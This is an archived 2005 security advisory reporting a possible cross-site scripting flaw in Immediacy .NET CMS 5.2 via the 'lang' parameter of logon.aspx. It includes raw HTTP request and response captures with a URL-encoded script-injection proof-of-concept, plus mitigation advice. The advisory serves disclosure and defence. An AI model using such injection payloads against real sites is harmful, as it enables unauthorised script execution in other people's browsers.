Visit our newest sister site!
Hundreds of free aircraft flight manuals
Civilian • Historical • Military • Declassified • FREE!


TUCoPS :: Web :: CMS / Portals :: b06-5658.htm

Immediacy .NET CMS possibly vulnerable to Cross Site Scripting through a malformed cookie



Immediacy .NET CMS possibly vulnerable to Cross Site Scripting through a malformed cookie
Immediacy .NET CMS possibly vulnerable to Cross Site Scripting through a malformed cookie



PR05-06: Immediacy .NET CMS possibly vulnerable to Cross Site Scripting
through a malformed cookie

This advisory has been published following consultation with UK NISCC
 

Date found: 2005-02-27

Vulnerable: Immediacy .NET CMS 5.2

Severity: Low

Author: Gemma Hughes [gemma.hughes at procheckup.com]

Vendor Status: CVE Candidate not Assigned

Description:

Immediacy CMS appears to allow Cross Site Scripting attacks via a
malformed 'Set-Cookie:' header. This issue concerns the 'logon.aspx'
program and 'lang' variable. This could allow attackers to cause the
execution of malicious script code within the context of the vulnerable
site.

Note: web browser-specific CRLF injection techniques may be required in
order to exploit this issue.


Information:

REQUEST:

GET
/logon.aspx?lang=
HTTP/1.1
Host: example.host.co.uk
Cookie: ASINFO=...; ASP.NET_SessionId=...; CNBOOK=...;
ASPSESSIONIDSCDAQTST=...
Referer: http://example.host.co.uk:80/environ.pl 
User-Agent: Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0; T312461;
.NET CLR 1.0.3705)
Connection: close


RESULT:

HTTP/1.1 302 Found
Connection: close
Date: Sun, 27 Feb 2005 19:18:31 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Location: /generalerror.aspx?aspxerrorpath=/logon.aspx
Set-Cookie: lang=;
expires=Mon, 27-Jun-2005 18:18:31 GMT; path=/
Content-Type: text/html; charset=utf-8
Content-Length: 161
Set-Cookie: ASINFO=...
Set-Cookie: CNBOOK=...
Cache-Control: proxy-revalidate

Object moved

Object moved to here.

It is also possible to submit the request using byte-encoded characters: REQUEST: GET /logon.aspx?lang=%3CSCRIPT%3Ealert%28'Can%20Cross%20Site%20Attack'%29%3C%2FSCRIPT%3E&page=272& HTTP/1.1 Host: example.host.co.uk Cookie: ASINFO=...; lang=cy; ASP.NET_SessionId=...; CNBOOK=ClearNet; ASPSESSIONIDSCDAQTST=... Referer: http://example.host.co.uk:80/default.aspx User-Agent: Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0; T312461; .NET CLR 1.0.3705) Connection: close RESULTS: HTTP/1.1 302 Found Connection: close Date: Sun, 27 Feb 2005 19:29:27 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 1.1.4322 Location: /generalerror.aspx?aspxerrorpath=/logon.aspx Set-Cookie: lang=; expires=Mon, 27-Jun-2005 18:29:27 GMT; path=/ Content-Type: text/html; charset=utf-8 Content-Length: 161 Set-Cookie: ASINFO=... Set-Cookie: CNBOOK=ClearNet;path=/;domain=.host.co.uk;expires=Fri, 31 Dec 2010 00:00:01 GMT Cache-Control: proxy-revalidate Object moved

Object moved to here.

Consequences: An attacker might cause the execution of malicious script code in the client (web browser) within the context of the site running the vulnerable version of Immediacy .NET CMS. Fix: Contact vendor. Ensure all input is filtered, especially the '<' and '>' characters. References: http://www.procheckup.com/Vulner_PR0506.php http://www.immediacy.co.uk/ Legal: Copyright 2005 ProCheckUp Ltd. All rights reserved. Permission is granted for copying and circulating this Bulletin to the Internet community for the purpose of alerting them to problems, if and only if the Bulletin is not changed or edited in any way, is attributed to ProCheckUp, and provided such reproduction and/or distribution is performed for non-commercial purposes. Any other use of this information is prohibited. ProCheckUp is not liable for any misuse of this information by any third party.


TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH